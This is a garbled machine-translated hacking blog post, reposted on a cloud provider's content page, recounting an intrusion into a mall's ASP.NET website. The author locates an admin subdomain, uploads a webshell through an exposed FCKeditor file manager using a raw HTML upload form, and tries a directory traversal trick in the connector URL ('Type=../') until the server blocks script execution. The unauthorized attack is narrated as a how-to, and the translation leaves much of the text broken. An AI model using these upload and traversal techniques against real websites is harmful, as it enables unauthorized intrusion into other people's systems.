An Intrusion Detection for a mall

Source: Internet
Author: User
Tags subdomain name

It was originally a simple look !... The website program is asp.net web Service is iis 6... 1

 

Take a rest and yell at two sentences in the group...

The scanning process was very slow, so I was impatient !...

Pick up ah d to scan... (PS: No... It seems that wood has been injected ...)

Helpless... Let's take a closer look at the website... Suddenly I found a problem with the image connection...

Because the image name is not automatically named, and the image is connected to the subdomain name... I have rich experience in the results...

Manager.XXX.com knows the background login address!

No injection, no password... What should I do? The ewebediter 404 fckeditor prompts 403 error.

Haha... Something is playing! So...

Upload our step Trojan...

<Form id = "frmUpload" enctype = "multipart/form-data"

Action ="

Type = Media "method =" post ">
Upload a new file: www.2cto.com <br>
<Input type = "file" name = "NewFile" size = "50"> <br>
<Input id = "btnUpload" type = "submit" value = "Upload">
</Form>

Upload successful... But it's not that easy to think about... When I open the horse... Yes!

2

This page cannot be displayed

You attempt to execute CGI, ISAPI, or other executable programs from the directory, but this directory does not allow execution of programs.
--------------------------------------------------------------------------------

Please try the following operations:

If you believe that the directory should allow access, contact the website administrator.
HTTP Error 403.1-Access prohibited: Access denied.
Internet Information Service (IIS)

No way... Helpless... So it's penetration!


Open

Manage.xxxx.com/FCKeditor/editor/filemanager/browser/default/browser.html?

Type = Image & connector = connectors/aspx/connector. aspx


Figure 3

Can be displayed normally... This is a drama...

 

Continue skipping the broken directory...

 

FCKeditor/editor/filemanager/browser/default/browser.html? Type = ../& connector = connectors/aspx/connector. aspx

Then jump to the inc directory...

 

The upload is successful, but the server does not allow the execution of asp programs...

 

Changing to aspx0000.jpg is also not allowed for access



Internet Explorer cannot display this webpage















From The Blog of Penker

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.